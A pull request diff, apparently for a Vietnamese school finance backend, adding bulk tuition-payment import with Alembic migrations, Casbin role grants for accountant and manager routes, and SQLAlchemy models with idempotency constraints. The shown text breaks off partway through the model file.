### PR TITLE
feat(finance): Import thu học phí hàng loạt — tự xác minh (BV-1→BV-6)

### DIFF
--- a/Backend_FastAPI/alembic/versions/bvg20260624001_casbin_payment_import_grants.py
+++ b/Backend_FastAPI/alembic/versions/bvg20260624001_casbin_payment_import_grants.py
@@ -1,0 +1,86 @@
+"""BV-2: Casbin grants cho route import thu học phí hàng loạt (template + preview)
+
+Cấp quyền 2 route MỚI cho accountant + manager:
+  GET  /api/payments/import/template
+  POST /api/payments/import/preview
+
+- admin đã có wildcard ('/*', '.*') → không cần grant riêng.
+- officer/user KHÔNG được cấp → CasbinAuth từ chối (403). require_finance_staff là
+  lớp gate thứ 2 (defense-in-depth) trên cùng route.
+- Khớp ACCOUNTANT_TEMPLATE + MANAGER_TEMPLATE trong policy_templates.py (nguồn cho
+  fresh-install / dev-test auto-seed); migration này seed cho DB prod đã có policy.
+- commit/void/batches (ghi tiền/đảo lô) sẽ thêm grant ở BV-3 (CÙNG dual-gate pattern).
+
+⚠️ PHẢI ghi v3='allow' (eft): auth_model.conf `p = sub, obj, act, eft` → row p thiếu
+v3 sẽ bị bỏ khi load_policy (hoặc RuntimeError "invalid policy size") → grant vô
+hiệu/sập auth. Đây đúng lỗi đã hotfix ở qae2e02_hotfix_null_eft_casbin_rules.py.
+Casbin nạp policy lúc app startup → cần RESTART backend sau migration thì grant mới
+hiệu lực (deploy.sh có restart).
+
+Idempotent: WHERE NOT EXISTS (re-run an toàn) + sweep NULL v3 (self-heal).
+
+Revision ID: bvg20260624001
+Revises: bvi20260624001
+Create Date: 2026-06-24
+"""
+
+from alembic import op
+from sqlalchemy import text
+
+
+revision = "bvg20260624001"
+down_revision = "bvi20260624001"
+branch_labels = None
+depends_on = None
+
+
+# (v0 subject, v1 object, v2 action, template_id)
+_GRANTS = [
+    ("role:accountant", "/api/payments/import/template", "GET", "accountant"),
+    ("role:accountant", "/api/payments/import/preview", "POST", "accountant"),
+    ("role:manager", "/api/payments/import/template", "GET", "manager"),
+    ("role:manager", "/api/payments/import/preview", "POST", "manager"),
+]
+
+_IMPORT_OBJECTS = (
+    "'/api/payments/import/template', '/api/payments/import/preview'"
+)
+
+
+def upgrade() -> None:
+    for v0, v1, v2, tmpl in _GRANTS:
+        # v3='allow' BẮT BUỘC (eft) — xem docstring + qae2e02.
+        op.execute(
+            text(
+                f"""
+            INSERT INTO casbin_rule (ptype, v0, v1, v2, v3, template_id, applied_at)
+            SELECT 'p', '{v0}', '{v1}', '{v2}', 'allow', '{tmpl}', NOW()
+            WHERE NOT EXISTS (
+                SELECT 1 FROM casbin_rule
+                WHERE ptype = 'p' AND v0 = '{v0}' AND v1 = '{v1}' AND v2 = '{v2}'
+            )
+            """
+            )
+        )
+    # Self-heal: grant đã tồn tại với v3 NULL (re-run sau bản thiếu eft) → set 'allow'.
+    op.execute(
+        text(
+            f"""
+            UPDATE casbin_rule SET v3 = CAST('allow' AS VARCHAR)
+            WHERE ptype = 'p' AND v3 IS NULL AND v1 IN ({_IMPORT_OBJECTS})
+            """
+        )
+    )
+    print(f"[bvg20260624001] Seeded {len(_GRANTS)} casbin grants (eft=allow)")
+
+
+def downgrade() -> None:
+    for v0, v1, v2, _tmpl in _GRANTS:
+        op.execute(
+            text(
+                f"""
+            DELETE FROM casbin_rule
+            WHERE ptype = 'p' AND v0 = '{v0}' AND v1 = '{v1}' AND v2 = '{v2}'
+            """
+            )
+        )

--- a/Backend_FastAPI/alembic/versions/bvh20260624001_casbin_payment_import_commit_grants.py
+++ b/Backend_FastAPI/alembic/versions/bvh20260624001_casbin_payment_import_commit_grants.py
@@ -1,0 +1,77 @@
+"""BV-3: Casbin grants cho route commit + lịch sử lô import thu học phí
+
+Cấp quyền 2 route MỚI (ghi tiền) cho accountant + manager:
+  POST /api/payments/import/{batch_id}/commit
+  GET  /api/payments/import/batches
+
+- admin có wildcard ('/*', '.*') → không cần grant riêng.
+- officer/user KHÔNG được cấp → CasbinAuth từ chối (403) + require_finance_staff (dual-gate).
+- Khớp ACCOUNTANT_TEMPLATE + MANAGER_TEMPLATE (policy_templates.py).
+- v3='allow' (eft) BẮT BUỘC — auth_model.conf p=sub,obj,act,eft; thiếu v3 → grant bị
+  bỏ khi load_policy (xem qae2e02). Casbin nạp lúc startup → RESTART backend sau migration.
+
+Idempotent: WHERE NOT EXISTS + sweep NULL v3 (self-heal). Khớp style bvg20260624001.
+
+Revision ID: bvh20260624001
+Revises: bvg20260624001
+Create Date: 2026-06-24
+"""
+
+from alembic import op
+from sqlalchemy import text
+
+
+revision = "bvh20260624001"
+down_revision = "bvg20260624001"
+branch_labels = None
+depends_on = None
+
+
+# (v0 subject, v1 object, v2 action, template_id)
+_GRANTS = [
+    ("role:accountant", "/api/payments/import/{batch_id}/commit", "POST", "accountant"),
+    ("role:accountant", "/api/payments/import/batches", "GET", "accountant"),
+    ("role:manager", "/api/payments/import/{batch_id}/commit", "POST", "manager"),
+    ("role:manager", "/api/payments/import/batches", "GET", "manager"),
+]
+
+_IMPORT_OBJECTS = (
+    "'/api/payments/import/{batch_id}/commit', '/api/payments/import/batches'"
+)
+
+
+def upgrade() -> None:
+    for v0, v1, v2, tmpl in _GRANTS:
+        op.execute(
+            text(
+                f"""
+            INSERT INTO casbin_rule (ptype, v0, v1, v2, v3, template_id, applied_at)
+            SELECT 'p', '{v0}', '{v1}', '{v2}', 'allow', '{tmpl}', NOW()
+            WHERE NOT EXISTS (
+                SELECT 1 FROM casbin_rule
+                WHERE ptype = 'p' AND v0 = '{v0}' AND v1 = '{v1}' AND v2 = '{v2}'
+            )
+            """
+            )
+        )
+    op.execute(
+        text(
+            f"""
+            UPDATE casbin_rule SET v3 = CAST('allow' AS VARCHAR)
+            WHERE ptype = 'p' AND v3 IS NULL AND v1 IN ({_IMPORT_OBJECTS})
+            """
+        )
+    )
+    print(f"[bvh20260624001] Seeded {len(_GRANTS)} casbin grants (eft=allow)")
+
+
+def downgrade() -> None:
+    for v0, v1, v2, _tmpl in _GRANTS:
+        op.execute(
+            text(
+                f"""
+            DELETE FROM casbin_rule
+            WHERE ptype = 'p' AND v0 = '{v0}' AND v1 = '{v1}' AND v2 = '{v2}'
+            """
+            )
+        )

--- a/Backend_FastAPI/alembic/versions/bvi20260624001_create_payment_import_tables.py
+++ b/Backend_FastAPI/alembic/versions/bvi20260624001_create_payment_import_tables.py
@@ -1,0 +1,83 @@
+"""BV-1: create payment_import_batch + payment_import_row (bulk payment verify)
+
+Hạ tầng cho luồng import file tổng hợp → tự xác minh thanh toán hàng loạt.
+Ref: Documents/BULK_PAYMENT_IMPORT_VERIFY_PLAN.md.
+
+Revision ID: bvi20260624001
+Revises: pra20260624001
+Create Date: 2026-06-24
+"""
+from alembic import op
+import sqlalchemy as sa
+from sqlalchemy.dialects import postgresql
+
+
+revision = "bvi20260624001"
+down_revision = "pra20260624001"
+branch_labels = None
+depends_on = None
+
+
+def upgrade() -> None:
+    op.create_table(
+        "payment_import_batch",
+        sa.Column("id", sa.Integer(), primary_key=True),
+        sa.Column("academic_year", sa.Integer(), nullable=False),
+        sa.Column("semester_no", sa.Integer(), nullable=False),
+        sa.Column("file_name", sa.String(length=255), nullable=False),
+        sa.Column("file_sha256", sa.String(length=64), nullable=False),
+        sa.Column("row_count", sa.Integer(), nullable=False, server_default="0"),
+        sa.Column("matched_count", sa.Integer(), nullable=False, server_default="0"),
+        sa.Column("warned_count", sa.Integer(), nullable=False, server_default="0"),
+        sa.Column("failed_count", sa.Integer(), nullable=False, server_default="0"),
+        sa.Column("total_amount", sa.Numeric(15, 2), nullable=False, server_default="0"),
+        sa.Column("status", sa.String(length=20), nullable=False, server_default="preview"),
+        sa.Column("created_by_id", sa.Integer(), nullable=True),
+        sa.Column(
+            "created_at", sa.DateTime(timezone=True), nullable=False,
+            server_default=sa.func.now(),
+        ),
+        sa.Column("committed_at", sa.DateTime(timezone=True), nullable=True),
+        sa.Column("voided_at", sa.DateTime(timezone=True), nullable=True),
+        sa.Column("void_reason", sa.Text(), nullable=True),
+        sa.ForeignKeyConstraint(["created_by_id"], ["user.id"], ondelete="SET NULL"),
+        sa.CheckConstraint(
+            "status IN ('preview', 'committed', 'void')",
+            name="chk_payment_import_batch_status",
+        ),
+        sa.CheckConstraint("semester_no >= 1", name="chk_payment_import_batch_semester"),
+    )
+    op.create_index(
+        "ix_payment_import_batch_academic_year", "payment_import_batch", ["academic_year"])
+    op.create_index(
+        "ix_payment_import_batch_file_sha256", "payment_import_batch", ["file_sha256"])
+    op.create_index("ix_payment_import_batch_status", "payment_import_batch", ["status"])
+    op.create_index(
+        "ix_payment_import_batch_created_by_id", "payment_import_batch", ["created_by_id"])
+
+    op.create_table(
+        "payment_import_row",
+        sa.Column("id", sa.Integer(), primary_key=True),
+        sa.Column("batch_id", sa.Integer(), nullable=False),
+        sa.Column("row_no", sa.Integer(), nullable=False),
+        sa.Column("citizen_id", sa.String(length=12), nullable=True),
+        sa.Column("raw", postgresql.JSONB(astext_type=sa.Text()), nullable=False),
+        sa.Column("resolved_profile_id", sa.Integer(), nullable=True),
+        sa.Column("resolved_fee_id", sa.Integer(), nullable=True),
+        sa.Column("status", sa.String(length=12), nullable=False),
+        sa.Column("message", sa.Text(), nullable=True),
+        sa.Column("amount", sa.Numeric(15, 2), nullable=True),
+        sa.Column("payment_ids", postgresql.JSONB(astext_type=sa.Text()), nullable=True),
+        sa.ForeignKeyConstraint(
+            ["batch_id"], ["payment_import_batch.id"], ondelete="CASCADE"),
+        sa.CheckConstraint(
+            "status IN ('matched', 'warned', 'error')",
+            name="chk_payment_import_row_status",
+        ),
+    )
+    op.create_index("ix_payment_import_row_batch_id", "payment_import_row", ["batch_id"])
+
+
+def downgrade() -> None:
+    op.drop_table("payment_import_row")
+    op.drop_table("payment_import_batch")

--- a/Backend_FastAPI/alembic/versions/bvi20260624001_create_payment_import_tables.py
+++ b/Backend_FastAPI/alembic/versions/bvi20260624001_create_payment_import_tables.py
@@ -37,6 +37,10 @@ def upgrade() -> None:
             "created_at", sa.DateTime(timezone=True), nullable=False,
             server_default=sa.func.now(),
         ),
+        sa.Column(
+            "updated_at", sa.DateTime(timezone=True), nullable=False,
+            server_default=sa.func.now(),
+        ),
         sa.Column("committed_at", sa.DateTime(timezone=True), nullable=True),
         sa.Column("voided_at", sa.DateTime(timezone=True), nullable=True),
         sa.Column("void_reason", sa.Text(), nullable=True),
@@ -54,6 +58,11 @@ def upgrade() -> None:
     op.create_index("ix_payment_import_batch_status", "payment_import_batch", ["status"])
     op.create_index(
         "ix_payment_import_batch_created_by_id", "payment_import_batch", ["created_by_id"])
+    # Idempotency: 1 batch CÒN HIỆU LỰC (preview/committed) / file (chống double-commit).
+    op.create_index(
+        "uq_payment_import_batch_active_file", "payment_import_batch", ["file_sha256"],
+        unique=True, postgresql_where=sa.text("status <> 'void'"),
+    )
 
     op.create_table(
         "payment_import_row",
@@ -74,6 +83,8 @@ def upgrade() -> None:
             "status IN ('matched', 'warned', 'error')",
             name="chk_payment_import_row_status",
         ),
+        sa.UniqueConstraint(
+            "batch_id", "row_no", name="uq_payment_import_row_batch_rowno"),
     )
     op.create_index("ix_payment_import_row_batch_id", "payment_import_row", ["batch_id"])
 

--- a/Backend_FastAPI/alembic/versions/bvj20260625001_casbin_payment_import_void_grant.py
+++ b/Backend_FastAPI/alembic/versions/bvj20260625001_casbin_payment_import_void_grant.py
@@ -1,0 +1,73 @@
+"""BV-3.5: Casbin grant cho route void (đảo lô) import thu học phí hàng loạt
+
+Cấp quyền route MỚI (đảo lô đã ghi tiền) cho **manager** (KHÔNG accountant):
+  POST /api/payments/import/{batch_id}/void
+
+- admin có wildcard ('/*', '.*') → không cần grant riêng.
+- accountant CỐ Ý KHÔNG được cấp: void cao hơn finance staff (manager/admin). Route
+  có dual-gate require_admin_or_manager nên accountant bị chặn cả 2 lớp.
+- officer/user KHÔNG được cấp → CasbinAuth từ chối (403).
+- Khớp MANAGER_TEMPLATE (policy_templates.py); migration này seed cho DB prod đã có policy.
+- v3='allow' (eft) BẮT BUỘC — auth_model.conf p=sub,obj,act,eft; thiếu v3 → grant bị
+  bỏ khi load_policy (xem qae2e02). Casbin nạp lúc startup → RESTART backend sau migration.
+
+Idempotent: WHERE NOT EXISTS + sweep NULL v3 (self-heal). Khớp style bvg/bvh.
+
+Revision ID: bvj20260625001
+Revises: bvh20260624001
+Create Date: 2026-06-25
+"""
+
+from alembic import op
+from sqlalchemy import text
+
+
+revision = "bvj20260625001"
+down_revision = "bvh20260624001"
+branch_labels = None
+depends_on = None
+
+
+# (v0 subject, v1 object, v2 action, template_id) — CHỈ manager.
+_GRANTS = [
+    ("role:manager", "/api/payments/import/{batch_id}/void", "POST", "manager"),
+]
+
+_IMPORT_OBJECTS = "'/api/payments/import/{batch_id}/void'"
+
+
+def upgrade() -> None:
+    for v0, v1, v2, tmpl in _GRANTS:
+        op.execute(
+            text(
+                f"""
+            INSERT INTO casbin_rule (ptype, v0, v1, v2, v3, template_id, applied_at)
+            SELECT 'p', '{v0}', '{v1}', '{v2}', 'allow', '{tmpl}', NOW()
+            WHERE NOT EXISTS (
+                SELECT 1 FROM casbin_rule
+                WHERE ptype = 'p' AND v0 = '{v0}' AND v1 = '{v1}' AND v2 = '{v2}'
+            )
+            """
+            )
+        )
+    op.execute(
+        text(
+            f"""
+            UPDATE casbin_rule SET v3 = CAST('allow' AS VARCHAR)
+            WHERE ptype = 'p' AND v3 IS NULL AND v1 IN ({_IMPORT_OBJECTS})
+            """
+        )
+    )
+    print(f"[bvj20260625001] Seeded {len(_GRANTS)} casbin grant (void, eft=allow)")
+
+
+def downgrade() -> None:
+    for v0, v1, v2, _tmpl in _GRANTS:
+        op.execute(
+            text(
+                f"""
+            DELETE FROM casbin_rule
+            WHERE ptype = 'p' AND v0 = '{v0}' AND v1 = '{v1}' AND v2 = '{v2}'
+            """
+            )
+        )

--- a/Backend_FastAPI/alembic/versions/bvk20260626001_casbin_payment_import_read_grants.py
+++ b/Backend_FastAPI/alembic/versions/bvk20260626001_casbin_payment_import_read_grants.py
@@ -1,0 +1,78 @@
+"""BV-5 R2/R1: Casbin grant cho 2 route ĐỌC import (chi tiết lô + tải file kết quả)
+
+Cấp quyền 2 route GET MỚI cho **accountant + manager** (đọc — như /import/batches):
+  GET /api/payments/import/batches/{batch_id}          (R2: xem lại per-row)
+  GET /api/payments/import/batches/{batch_id}/result   (R1: tải file kết quả)
+
+- admin có wildcard ('/*', '.*') → không cần grant riêng.
+- accountant + manager: cùng audience đọc với /import/batches (bvh) + /import/preview (bvg).
+- officer/user KHÔNG cấp → CasbinAuth từ chối (403).
+- v3='allow' (eft) BẮT BUỘC — auth_model.conf p=sub,obj,act,eft; thiếu v3 → grant bị bỏ
+  khi load_policy. Casbin nạp lúc startup → RESTART backend sau migration.
+
+Idempotent: WHERE NOT EXISTS + sweep NULL v3 (self-heal). Khớp style bvg/bvh/bvj.
+
+Revision ID: bvk20260626001
+Revises: bvj20260625001
+Create Date: 2026-06-26
+"""
+
+from alembic import op
+from sqlalchemy import text
+
+
+revision = "bvk20260626001"
+down_revision = "bvj20260625001"
+branch_labels = None
+depends_on = None
+
+
+_DETAIL = "/api/payments/import/batches/{batch_id}"
+_RESULT = "/api/payments/import/batches/{batch_id}/result"
+
+# (v0 subject, v1 object, v2 action, template_id)
+_GRANTS = [
+    ("role:accountant", _DETAIL, "GET", "accountant"),
+    ("role:accountant", _RESULT, "GET", "accountant"),
+    ("role:manager", _DETAIL, "GET", "manager"),
+    ("role:manager", _RESULT, "GET", "manager"),
+]
+
+_IMPORT_OBJECTS = f"'{_DETAIL}', '{_RESULT}'"
+
+
+def upgrade() -> None:
+    for v0, v1, v2, tmpl in _GRANTS:
+        op.execute(
+            text(
+                f"""
+            INSERT INTO casbin_rule (ptype, v0, v1, v2, v3, template_id, applied_at)
+            SELECT 'p', '{v0}', '{v1}', '{v2}', 'allow', '{tmpl}', NOW()
+            WHERE NOT EXISTS (
+                SELECT 1 FROM casbin_rule
+                WHERE ptype = 'p' AND v0 = '{v0}' AND v1 = '{v1}' AND v2 = '{v2}'
+            )
+            """
+            )
+        )
+    op.execute(
+        text(
+            f"""
+            UPDATE casbin_rule SET v3 = CAST('allow' AS VARCHAR)
+            WHERE ptype = 'p' AND v3 IS NULL AND v1 IN ({_IMPORT_OBJECTS})
+            """
+        )
+    )
+    print(f"[bvk20260626001] Seeded {len(_GRANTS)} casbin grant (read detail/result, eft=allow)")
+
+
+def downgrade() -> None:
+    for v0, v1, v2, _tmpl in _GRANTS:
+        op.execute(
+            text(
+                f"""
+            DELETE FROM casbin_rule
+            WHERE ptype = 'p' AND v0 = '{v0}' AND v1 = '{v1}' AND v2 = '{v2}'
+            """
+            )
+        )

--- a/Backend_FastAPI/app/casbin_config/policy_templates.py
+++ b/Backend_FastAPI/app/casbin_config/policy_templates.py
@@ -380,6 +380,10 @@ ACCOUNTANT_TEMPLATE: PolicyTemplate = {
         {"subject": "{role}", "object": "/api/payments/intents", "action": "POST"},
         {"subject": "{role}", "object": "/api/payments/intents/{id}", "action": "GET"},
         {"subject": "{role}", "object": "/api/payments/methods", "action": "GET"},
+        # BV-2 Bulk payment import — template + preview (dry-run). Accountant tự
+        # xác minh; commit/void (ghi tiền/đảo lô) thêm grant ở BV-3.
+        {"subject": "{role}", "object": "/api/payments/import/template", "action": "GET"},
+        {"subject": "{role}", "object": "/api/payments/import/preview", "action": "POST"},
 
         # ACCOUNTING PERIODS - View only (create/close is admin only)
         {"subject": "{role}", "object": "/api/accounting/periods", "action": "GET"},
@@ -606,6 +610,9 @@ MANAGER_TEMPLATE: PolicyTemplate = {
         {"subject": "{role}", "object": "/api/payments/{id}", "action": "GET"},
         {"subject": "{role}", "object": "/api/payments/{id}/verify", "action": "PUT"},  # Verify payment (maker-checker)
         {"subject": "{role}", "object": "/api/payments/{id}/reject", "action": "PUT"},  # Reject payment
+        # BV-2 Bulk payment import — template + preview (dry-run).
+        {"subject": "{role}", "object": "/api/payments/import/template", "action": "GET"},
+        {"subject": "{role}", "object": "/api/payments/import/preview", "action": "POST"},
         {"subject": "{role}", "object": "/api/refunds", "action": "GET"},
         {"subject": "{role}", "object": "/api/refunds/{id}", "action": "GET"},
         {"subject": "{role}", "object": "/api/refunds/{id}/approve", "action": "POST"},

--- a/Backend_FastAPI/app/casbin_config/policy_templates.py
+++ b/Backend_FastAPI/app/casbin_config/policy_templates.py
@@ -384,6 +384,9 @@ ACCOUNTANT_TEMPLATE: PolicyTemplate = {
         # xác minh; commit/void (ghi tiền/đảo lô) thêm grant ở BV-3.
         {"subject": "{role}", "object": "/api/payments/import/template", "action": "GET"},
         {"subject": "{role}", "object": "/api/payments/import/preview", "action": "POST"},
+        # BV-3 commit (ghi tiền) + lịch sử lô
+        {"subject": "{role}", "object": "/api/payments/import/{batch_id}/commit", "action": "POST"},
+        {"subject": "{role}", "object": "/api/payments/import/batches", "action": "GET"},
 
         # ACCOUNTING PERIODS - View only (create/close is admin only)
         {"subject": "{role}", "object": "/api/accounting/periods", "action": "GET"},
@@ -613,6 +616,9 @@ MANAGER_TEMPLATE: PolicyTemplate = {
         # BV-2 Bulk payment import — template + preview (dry-run).
         {"subject": "{role}", "object": "/api/payments/import/template", "action": "GET"},
         {"subject": "{role}", "object": "/api/payments/import/preview", "action": "POST"},
+        # BV-3 commit (ghi tiền) + lịch sử lô
+        {"subject": "{role}", "object": "/api/payments/import/{batch_id}/commit", "action": "POST"},
+        {"subject": "{role}", "object": "/api/payments/import/batches", "action": "GET"},
         {"subject": "{role}", "object": "/api/refunds", "action": "GET"},
         {"subject": "{role}", "object": "/api/refunds/{id}", "action": "GET"},
         {"subject": "{role}", "object": "/api/refunds/{id}/approve", "action": "POST"},

--- a/Backend_FastAPI/app/casbin_config/policy_templates.py
+++ b/Backend_FastAPI/app/casbin_config/policy_templates.py
@@ -619,6 +619,8 @@ MANAGER_TEMPLATE: PolicyTemplate = {
         # BV-3 commit (ghi tiền) + lịch sử lô
         {"subject": "{role}", "object": "/api/payments/import/{batch_id}/commit", "action": "POST"},
         {"subject": "{role}", "object": "/api/payments/import/batches", "action": "GET"},
+        # BV-3.5 void (đảo lô đã ghi) — manager/admin ONLY (accountant KHÔNG có)
+        {"subject": "{role}", "object": "/api/payments/import/{batch_id}/void", "action": "POST"},
         {"subject": "{role}", "object": "/api/refunds", "action": "GET"},
         {"subject": "{role}", "object": "/api/refunds/{id}", "action": "GET"},
         {"subject": "{role}", "object": "/api/refunds/{id}/approve", "action": "POST"},

--- a/Backend_FastAPI/app/casbin_config/policy_templates.py
+++ b/Backend_FastAPI/app/casbin_config/policy_templates.py
@@ -387,6 +387,9 @@ ACCOUNTANT_TEMPLATE: PolicyTemplate = {
         # BV-3 commit (ghi tiền) + lịch sử lô
         {"subject": "{role}", "object": "/api/payments/import/{batch_id}/commit", "action": "POST"},
         {"subject": "{role}", "object": "/api/payments/import/batches", "action": "GET"},
+        # BV-5 R2/R1 đọc: chi tiết lô (per-row) + tải file kết quả
+        {"subject": "{role}", "object": "/api/payments/import/batches/{batch_id}", "action": "GET"},
+        {"subject": "{role}", "object": "/api/payments/import/batches/{batch_id}/result", "action": "GET"},
 
         # ACCOUNTING PERIODS - View only (create/close is admin only)
         {"subject": "{role}", "object": "/api/accounting/periods", "action": "GET"},
@@ -619,6 +622,9 @@ MANAGER_TEMPLATE: PolicyTemplate = {
         # BV-3 commit (ghi tiền) + lịch sử lô
         {"subject": "{role}", "object": "/api/payments/import/{batch_id}/commit", "action": "POST"},
         {"subject": "{role}", "object": "/api/payments/import/batches", "action": "GET"},
+        # BV-5 R2/R1 đọc: chi tiết lô (per-row) + tải file kết quả
+        {"subject": "{role}", "object": "/api/payments/import/batches/{batch_id}", "action": "GET"},
+        {"subject": "{role}", "object": "/api/payments/import/batches/{batch_id}/result", "action": "GET"},
         # BV-3.5 void (đảo lô đã ghi) — manager/admin ONLY (accountant KHÔNG có)
         {"subject": "{role}", "object": "/api/payments/import/{batch_id}/void", "action": "POST"},
         {"subject": "{role}", "object": "/api/refunds", "action": "GET"},

--- a/Backend_FastAPI/app/models/finance/__init__.py
+++ b/Backend_FastAPI/app/models/finance/__init__.py
@@ -37,6 +37,12 @@ from .payment_intent import PaymentIntent, PaymentIntentStatusEnum, GatewayStatu
 from .payment import Payment, PaymentTransaction, PaymentStatusEnum, TransactionTypeEnum
 from .refund import RefundRequest, RefundStatusEnum
 from .overpayment import OverpaymentRecord, OverpaymentStatusEnum, ResolutionTypeEnum
+from .payment_import import (
+    PaymentImportBatch,
+    PaymentImportRow,
+    PaymentImportBatchStatusEnum,
+    PaymentImportRowStatusEnum,
+)
 
 __all__ = [
     # Enums - Fee
@@ -72,4 +78,9 @@ __all__ = [
     # Models - Refund & Overpayment
     "RefundRequest",
     "OverpaymentRecord",
+    # Bulk payment import (BV)
+    "PaymentImportBatch",
+    "PaymentImportRow",
+    "PaymentImportBatchStatusEnum",
+    "PaymentImportRowStatusEnum",
 ]

--- a/Backend_FastAPI/app/models/finance/payment_import.py
+++ b/Backend_FastAPI/app/models/finance/payment_import.py
@@ -15,7 +15,8 @@ from decimal import Decimal
 from typing import TYPE_CHECKING, List, Optional
 
 from sqlalchemy import (
-    CheckConstraint, DateTime, ForeignKey, Integer, Numeric, String, Text,
+    CheckConstraint, DateTime, ForeignKey, Index, Integer, Numeric, String,
+    Text, UniqueConstraint, func, text,
 )
 from sqlalchemy.dialects.postgresql import JSONB
 from sqlalchemy.orm import Mapped, mapped_column, relationship
@@ -53,6 +54,15 @@ class PaymentImportBatch(Base):
             name="chk_payment_import_batch_status",
         ),
         CheckConstraint("semester_no >= 1", name="chk_payment_import_batch_semester"),
+        # Idempotency tại DB: tối đa 1 batch CÒN HIỆU LỰC (preview/committed) cho mỗi
+        # file → chống re-import + double-commit cùng file (kể cả 2 upload race).
+        # 'void' thoát ràng buộc nên đảo batch sai rồi import lại được.
+        Index(
+            "uq_payment_import_batch_active_file",
+            "file_sha256",
+            unique=True,
+            postgresql_where=text("status <> 'void'"),
+        ),
     )
 
     id: Mapped[int] = mapped_column(Integer, primary_key=True)
@@ -64,10 +74,14 @@ class PaymentImportBatch(Base):
     file_name: Mapped[str] = mapped_column(String(255), nullable=False)
     file_sha256: Mapped[str] = mapped_column(String(64), nullable=False, index=True)
 
-    row_count: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
-    matched_count: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
-    warned_count: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
-    failed_count: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
+    row_count: Mapped[int] = mapped_column(
+        Integer, nullable=False, default=0, server_default="0")
+    matched_count: Mapped[int] = mapped_column(
+        Integer, nullable=False, default=0, server_default="0")
+    warned_count: Mapped[int] = mapped_column(
+        Integer, nullable=False, default=0, server_default="0")
+    failed_count: Mapped[int] = mapped_column(
+        Integer, nullable=False, default=0, server_default="0")
     total_amount: Mapped[Decimal] = mapped_column(
         Numeric(15, 2), nullable=False, default=Decimal("0"), server_default="0",
         comment="Tổng tiền dự kiến/đã ghi (gốc học phí)",
@@ -85,7 +99,12 @@ class PaymentImportBatch(Base):
     )
     created_at: Mapped[datetime] = mapped_column(
         DateTime(timezone=True), nullable=False,
+        default=lambda: datetime.now(timezone.utc), server_default=func.now(),
+    )
+    updated_at: Mapped[datetime] = mapped_column(
+        DateTime(timezone=True), nullable=False,
         default=lambda: datetime.now(timezone.utc),
+        onupdate=lambda: datetime.now(timezone.utc), server_default=func.now(),
     )
     committed_at: Mapped[Optional[datetime]] = mapped_column(
         DateTime(timezone=True), nullable=True)
@@ -95,7 +114,9 @@ class PaymentImportBatch(Base):
 
     rows: Mapped[List["PaymentImportRow"]] = relationship(
         "PaymentImportRow", back_populates="batch",
-        cascade="all, delete-orphan", lazy="selectin",
+        cascade="all, delete-orphan",
+        # lazy mặc định (select) — KHÔNG eager: list batch không kéo hết dòng của
+        # mọi batch; chỉ selectinload(rows) trong query xem chi tiết 1 batch.
     )
     created_by: Mapped[Optional["User"]] = relationship("User")
 
@@ -119,6 +140,8 @@ class PaymentImportRow(Base):
             "status IN ('matched', 'warned', 'error')",
             name="chk_payment_import_row_status",
         ),
+        # Chống trùng dòng (parser chạy lại/bug) → void & đối soát theo row_no rõ ràng.
+        UniqueConstraint("batch_id", "row_no", name="uq_payment_import_row_batch_rowno"),
     )
 
     id: Mapped[int] = mapped_column(Integer, primary_key=True)

--- a/Backend_FastAPI/app/models/finance/payment_import.py
+++ b/Backend_FastAPI/app/models/finance/payment_import.py
@@ -1,0 +1,148 @@
+# app/models/finance/payment_import.py
+"""
+Payment Import models - Bulk payment verify via file import (BV).
+
+Kế toán thu offline → import file tổng hợp → hệ thống tự xác minh (auto-verify)
+hàng loạt. Luồng 2 pha: preview (dry-run, KHÔNG ghi tiền) → commit (auto-verify
+từng dòng dưới khóa, re-validate). Maker-checker giữ: kế toán = maker, system_user
+= checker.
+
+Ref: Documents/BULK_PAYMENT_IMPORT_VERIFY_PLAN.md (DESIGN v2).
+"""
+import enum
+from datetime import datetime, timezone
+from decimal import Decimal
+from typing import TYPE_CHECKING, List, Optional
+
+from sqlalchemy import (
+    CheckConstraint, DateTime, ForeignKey, Integer, Numeric, String, Text,
+)
+from sqlalchemy.dialects.postgresql import JSONB
+from sqlalchemy.orm import Mapped, mapped_column, relationship
+
+from app.models.base import Base
+
+if TYPE_CHECKING:
+    from app.models.user import User
+
+
+class PaymentImportBatchStatusEnum(str, enum.Enum):
+    """Import batch lifecycle."""
+    preview = "preview"        # dry-run resolved, chưa ghi Payment
+    committed = "committed"    # đã auto-verify các dòng MATCHED
+    void = "void"              # đã đảo (rút lại) batch committed sai
+
+
+class PaymentImportRowStatusEnum(str, enum.Enum):
+    """Per-row outcome of resolve/validate."""
+    matched = "matched"        # ghi được (có thể kèm warning)
+    warned = "warned"          # ghi được + cảnh báo (lệch tên / tràn nhiều đợt / nghi trùng)
+    error = "error"            # KHÔNG ghi (không khớp / vượt tổng / sai định dạng)
+
+
+class PaymentImportBatch(Base):
+    """A bulk payment-import lô.
+
+    ``file_sha256`` chống re-import cùng file. Đếm ``matched/warned/failed`` cho
+    đối soát. Trạng thái ``preview`` → ``committed`` → (``void`` nếu đảo).
+    """
+    __tablename__ = "payment_import_batch"
+    __table_args__ = (
+        CheckConstraint(
+            "status IN ('preview', 'committed', 'void')",
+            name="chk_payment_import_batch_status",
+        ),
+        CheckConstraint("semester_no >= 1", name="chk_payment_import_batch_semester"),
+    )
+
+    id: Mapped[int] = mapped_column(Integer, primary_key=True)
+
+    # Cấp batch (kế toán chọn khi import — không có trên từng dòng file)
+    academic_year: Mapped[int] = mapped_column(Integer, nullable=False, index=True)
+    semester_no: Mapped[int] = mapped_column(Integer, nullable=False)
+
+    file_name: Mapped[str] = mapped_column(String(255), nullable=False)
+    file_sha256: Mapped[str] = mapped_column(String(64), nullable=False, index=True)
+
+    row_count: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
+    matched_count: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
+    warned_count: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
+    failed_count: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
+    total_amount: Mapped[Decimal] = mapped_column(
+        Numeric(15, 2), nullable=False, default=Decimal("0"), server_default="0",
+        comment="Tổng tiền dự kiến/đã ghi (gốc học phí)",
+    )
+
+    status: Mapped[str] = mapped_column(
+        String(20), nullable=False,
+        default=PaymentImportBatchStatusEnum.preview.value,
+        server_default="preview", index=True,
+    )
+
+    created_by_id: Mapped[Optional[int]] = mapped_column(
